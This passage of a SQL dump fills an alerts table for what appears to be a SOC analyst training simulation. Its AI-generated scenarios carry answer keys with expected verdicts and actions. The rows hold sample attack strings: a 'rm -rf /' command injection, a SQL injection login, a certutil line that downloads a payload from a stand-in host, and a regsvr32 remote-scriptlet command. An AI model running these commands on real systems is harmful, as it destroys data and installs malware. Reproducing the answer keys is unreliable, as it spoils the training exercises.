1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:30:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.200.15\\\",\\\"email_sender\\\":\\\"alert@secure-mail.com\\\",\\\"username\\\":\\\"john.doe@company.com\\\",\\\"hostname\\\":\\\"MAIL-SERVER-01\\\",\\\"url\\\":\\\"http://malicious-site.com/login\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.141Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:30:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.200.15\\\",\\\"email_sender\\\":\\\"alert@secure-mail.com\\\",\\\"username\\\":\\\"john.doe@company.com\\\",\\\"hostname\\\":\\\"MAIL-SERVER-01\\\",\\\"url\\\":\\\"http://malicious-site.com/login\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.141Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:30:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.200.15\\\",\\\"email_sender\\\":\\\"alert@secure-mail.com\\\",\\\"username\\\":\\\"john.doe@company.com\\\",\\\"hostname\\\":\\\"MAIL-SERVER-01\\\",\\\"url\\\":\\\"http://malicious-site.com/login\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.141Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:30:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.200.15\\\",\\\"email_sender\\\":\\\"alert@secure-mail.com\\\",\\\"username\\\":\\\"john.doe@company.com\\\",\\\"hostname\\\":\\\"MAIL-SERVER-01\\\",\\\"url\\\":\\\"http://malicious-site.com/login\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1744, 'Fancy Bear Command Injection via Web Application', 'critical', 'Recorded Future', 'Detected command injection attempt from external IP using vulnerable web application endpoint.', 'Web Attack', 'T1190', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T09:15:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.25\",\"dst_ip\":\"192.168.250.10\",\"hostname\":\"WEB-SERVER-01\",\"request_body\":\"id=1; rm -rf /\",\"url\":\"http://target-site.com/vulnerable-endpoint\"}', '2026-03-15 19:52:44', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for multiple web-based attacks\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://target-site.com/vulnerable-endpoint\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Endpoint known to be vulnerable\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"id=1; rm -rf /\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"Command injection attempt to compromise web server, typical Fancy Bear tactic.\"}', 'Advanced', 'TI', 7, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.149Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:15:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.25\\\",\\\"dst_ip\\\":\\\"192.168.250.10\\\",\\\"hostname\\\":\\\"WEB-SERVER-01\\\",\\\"request_body\\\":\\\"id=1; rm -rf /\\\",\\\"url\\\":\\\"http://target-site.com/vulnerable-endpoint\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.149Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:15:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.25\\\",\\\"dst_ip\\\":\\\"192.168.250.10\\\",\\\"hostname\\\":\\\"WEB-SERVER-01\\\",\\\"request_body\\\":\\\"id=1; rm -rf /\\\",\\\"url\\\":\\\"http://target-site.com/vulnerable-endpoint\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.149Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:15:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.25\\\",\\\"dst_ip\\\":\\\"192.168.250.10\\\",\\\"hostname\\\":\\\"WEB-SERVER-01\\\",\\\"request_body\\\":\\\"id=1; rm -rf /\\\",\\\"url\\\":\\\"http://target-site.com/vulnerable-endpoint\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.149Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:15:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.25\\\",\\\"dst_ip\\\":\\\"192.168.250.10\\\",\\\"hostname\\\":\\\"WEB-SERVER-01\\\",\\\"request_body\\\":\\\"id=1; rm -rf /\\\",\\\"url\\\":\\\"http://target-site.com/vulnerable-endpoint\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.149Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:15:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.25\\\",\\\"dst_ip\\\":\\\"192.168.250.10\\\",\\\"hostname\\\":\\\"WEB-SERVER-01\\\",\\\"request_body\\\":\\\"id=1; rm -rf /\\\",\\\"url\\\":\\\"http://target-site.com/vulnerable-endpoint\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(1745, 'Cozy Bear Credential Harvesting via Spear-Phishing', 'high', 'Anomali', 'Spear-phishing email detected with a link to a credential harvesting site impersonating internal IT department.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T11:00:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.55\",\"dst_ip\":\"192.168.1.30\",\"email_sender\":\"it-support@company-fake.com\",\"username\":\"alice.smith@company.com\",\"hostname\":\"MAIL-SERVER-02\",\"url\":\"https://fake-it-support.com/login\"}', '2026-03-15 19:52:44', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP known for phishing activities\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"it-support@company-fake.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email domain closely resembles legitimate company domain\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"https://fake-it-support.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL hosts a credential harvesting page\"}}],\"expected_actions\":[\"block_ip\",\"block_url\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"Spear-phishing attempt with a spoofed IT email targeting user credentials.\"}', 'Advanced', 'TI', 7, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.151Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:00:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"email_sender\\\":\\\"it-support@company-fake.com\\\",\\\"username\\\":\\\"alice.smith@company.com\\\",\\\"hostname\\\":\\\"MAIL-SERVER-02\\\",\\\"url\\\":\\\"https://fake-it-support.com/login\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.151Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:00:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"email_sender\\\":\\\"it-support@company-fake.com\\\",\\\"username\\\":\\\"alice.smith@company.com\\\",\\\"hostname\\\":\\\"MAIL-SERVER-02\\\",\\\"url\\\":\\\"https://fake-it-support.com/login\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.151Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:00:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"email_sender\\\":\\\"it-support@company-fake.com\\\",\\\"username\\\":\\\"alice.smith@company.com\\\",\\\"hostname\\\":\\\"MAIL-SERVER-02\\\",\\\"url\\\":\\\"https://fake-it-support.com/login\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.151Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:00:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"email_sender\\\":\\\"it-support@company-fake.com\\\",\\\"username\\\":\\\"alice.smith@company.com\\\",\\\"hostname\\\":\\\"MAIL-SERVER-02\\\",\\\"url\\\":\\\"https://fake-it-support.com/login\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.151Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:00:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"email_sender\\\":\\\"it-support@company-fake.com\\\",\\\"username\\\":\\\"alice.smith@company.com\\\",\\\"hostname\\\":\\\"MAIL-SERVER-02\\\",\\\"url\\\":\\\"https://fake-it-support.com/login\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1746, 'APT29 Supply Chain Attack Using Certutil', 'critical', 'Recorded Future', 'APT29 suspected to be using certutil for downloading malicious payloads within supply chain compromise.', 'Malware', 'T1105', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T13:05:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.50\",\"hostname\":\"SUPPLY-CHAIN-SERVER-01\",\"command_line\":\"certutil -urlcache -split -f http://malicious-server.com/payload.exe C:\\\\temp\\\\payload.exe\",\"file_hash\":\"abc123def456ghi789jkl012mno345pqr678stu901vwx234yz567abcd890efg12\"}', '2026-03-15 19:52:44', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"certutil -urlcache -split -f http://malicious-server.com/payload.exe C:\\\\temp\\\\payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Certutil command used for downloading malware\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-server.com/payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL hosts malware payload\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"abc123def456ghi789jkl012mno345pqr678stu901vwx234yz567abcd890efg12\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with known malware\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"APT29 leveraging certutil to download and execute malware, indicating a supply chain attack.\"}', 'Advanced', 'TI', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.153Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:05:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"hostname\\\":\\\"SUPPLY-CHAIN-SERVER-01\\\",\\\"command_line\\\":\\\"certutil -urlcache -split -f http://malicious-server.com/payload.exe C:\\\\\\\\temp\\\\\\\\payload.exe\\\",\\\"file_hash\\\":\\\"abc123def456ghi789jkl012mno345pqr678stu901vwx234yz567abcd890efg12\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.153Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:05:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"hostname\\\":\\\"SUPPLY-CHAIN-SERVER-01\\\",\\\"command_line\\\":\\\"certutil -urlcache -split -f http://malicious-server.com/payload.exe C:\\\\\\\\temp\\\\\\\\payload.exe\\\",\\\"file_hash\\\":\\\"abc123def456ghi789jkl012mno345pqr678stu901vwx234yz567abcd890efg12\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.153Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:05:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"hostname\\\":\\\"SUPPLY-CHAIN-SERVER-01\\\",\\\"command_line\\\":\\\"certutil -urlcache -split -f http://malicious-server.com/payload.exe C:\\\\\\\\temp\\\\\\\\payload.exe\\\",\\\"file_hash\\\":\\\"abc123def456ghi789jkl012mno345pqr678stu901vwx234yz567abcd890efg12\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.153Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:05:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"hostname\\\":\\\"SUPPLY-CHAIN-SERVER-01\\\",\\\"command_line\\\":\\\"certutil -urlcache -split -f http://malicious-server.com/payload.exe C:\\\\\\\\temp\\\\\\\\payload.exe\\\",\\\"file_hash\\\":\\\"abc123def456ghi789jkl012mno345pqr678stu901vwx234yz567abcd890efg12\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.153Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:05:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"hostname\\\":\\\"SUPPLY-CHAIN-SERVER-01\\\",\\\"command_line\\\":\\\"certutil -urlcache -split -f http://malicious-server.com/payload.exe C:\\\\\\\\temp\\\\\\\\payload.exe\\\",\\\"file_hash\\\":\\\"abc123def456ghi789jkl012mno345pqr678stu901vwx234yz567abcd890efg12\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1747, 'Suspicious PowerShell Execution with Encoded Commands', 'medium', 'Anomali', 'Detected PowerShell process executing encoded commands, possibly benign administrative activity.', 'Suspicious Activity', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T14:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.10.10\",\"hostname\":\"ADMIN-PC-01\",\"command_line\":\"powershell.exe -enc W1BMAG8AZwBdACAALQBtAGUAcwBzAGEAZwBlACAAIgBDAGgAZQBjAGsAaQBuAGcAIABsAG8AZwBzAC4ALgAuAC4AIgA=\"}', '2026-03-15 19:52:44', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address executing PowerShell\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -enc W1BMAG8AZwBdACAALQBtAGUAcwBzAGEAZwBlACAAIgBDAGgAZQBjAGsAaQBuAGcAIABsAG8AZwBzAC4ALgAuAC4AIgA=\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Encoded PowerShell command indicative of admin activity\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"suspicious_activity\",\"analysis_notes\":\"Encoded PowerShell commands are often used by administrators for scripting, no malicious intent found.\"}', 'Advanced', 'TI', 7, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.157Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.10\\\",\\\"hostname\\\":\\\"ADMIN-PC-01\\\",\\\"command_line\\\":\\\"powershell.exe -enc W1BMAG8AZwBdACAALQBtAGUAcwBzAGEAZwBlACAAIgBDAGgAZQBjAGsAaQBuAGcAIABsAG8AZwBzAC4ALgAuAC4AIgA=\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.157Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.10\\\",\\\"hostname\\\":\\\"ADMIN-PC-01\\\",\\\"command_line\\\":\\\"powershell.exe -enc W1BMAG8AZwBdACAALQBtAGUAcwBzAGEAZwBlACAAIgBDAGgAZQBjAGsAaQBuAGcAIABsAG8AZwBzAC4ALgAuAC4AIgA=\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.157Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.10\\\",\\\"hostname\\\":\\\"ADMIN-PC-01\\\",\\\"command_line\\\":\\\"powershell.exe -enc W1BMAG8AZwBdACAALQBtAGUAcwBzAGEAZwBlACAAIgBDAGgAZQBjAGsAaQBuAGcAIABsAG8AZwBzAC4ALgAuAC4AIgA=\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.157Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.10\\\",\\\"hostname\\\":\\\"ADMIN-PC-01\\\",\\\"command_line\\\":\\\"powershell.exe -enc W1BMAG8AZwBdACAALQBtAGUAcwBzAGEAZwBlACAAIgBDAGgAZQBjAGsAaQBuAGcAIABsAG8AZwBzAC4ALgAuAC4AIgA=\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.157Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.10\\\",\\\"hostname\\\":\\\"ADMIN-PC-01\\\",\\\"command_line\\\":\\\"powershell.exe -enc W1BMAG8AZwBdACAALQBtAGUAcwBzAGEAZwBlACAAIgBDAGgAZQBjAGsAaQBuAGcAIABsAG8AZwBzAC4ALgAuAC4AIgA=\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1748, 'Regsvr32 Execution Detected, Suspicious but Benign', 'low', 'MISP', 'Regsvr32 used to load a DLL from an internal source, typical of software updates or internal maintenance.', 'Suspicious Activity', 'T1218', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T16:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.50.25\",\"hostname\":\"MAINTENANCE-PC-01\",\"command_line\":\"regsvr32 /s /n /u /i:http://internal-server.com/update.dll scrobj.dll\"}', '2026-03-15 19:52:44', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.50.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address executing regsvr32\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"regsvr32 /s /n /u /i:http://internal-server.com/update.dll scrobj.dll\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Regsvr32 command used for legitimate software update\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://internal-server.com/update.dll\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"clean\",\"details\":\"Internal URL used for software updates\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"suspicious_activity\",\"analysis_notes\":\"Regsvr32 detected from internal source, consistent with legitimate software update processes.\"}', 'Advanced', 'TI', 7, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.159Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.50.25\\\",\\\"hostname\\\":\\\"MAINTENANCE-PC-01\\\",\\\"command_line\\\":\\\"regsvr32 /s /n /u /i:http://internal-server.com/update.dll scrobj.dll\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.159Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.50.25\\\",\\\"hostname\\\":\\\"MAINTENANCE-PC-01\\\",\\\"command_line\\\":\\\"regsvr32 /s /n /u /i:http://internal-server.com/update.dll scrobj.dll\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.159Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.50.25\\\",\\\"hostname\\\":\\\"MAINTENANCE-PC-01\\\",\\\"command_line\\\":\\\"regsvr32 /s /n /u /i:http://internal-server.com/update.dll scrobj.dll\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.159Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.50.25\\\",\\\"hostname\\\":\\\"MAINTENANCE-PC-01\\\",\\\"command_line\\\":\\\"regsvr32 /s /n /u /i:http://internal-server.com/update.dll scrobj.dll\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.159Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.50.25\\\",\\\"hostname\\\":\\\"MAINTENANCE-PC-01\\\",\\\"command_line\\\":\\\"regsvr32 /s /n /u /i:http://internal-server.com/update.dll scrobj.dll\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
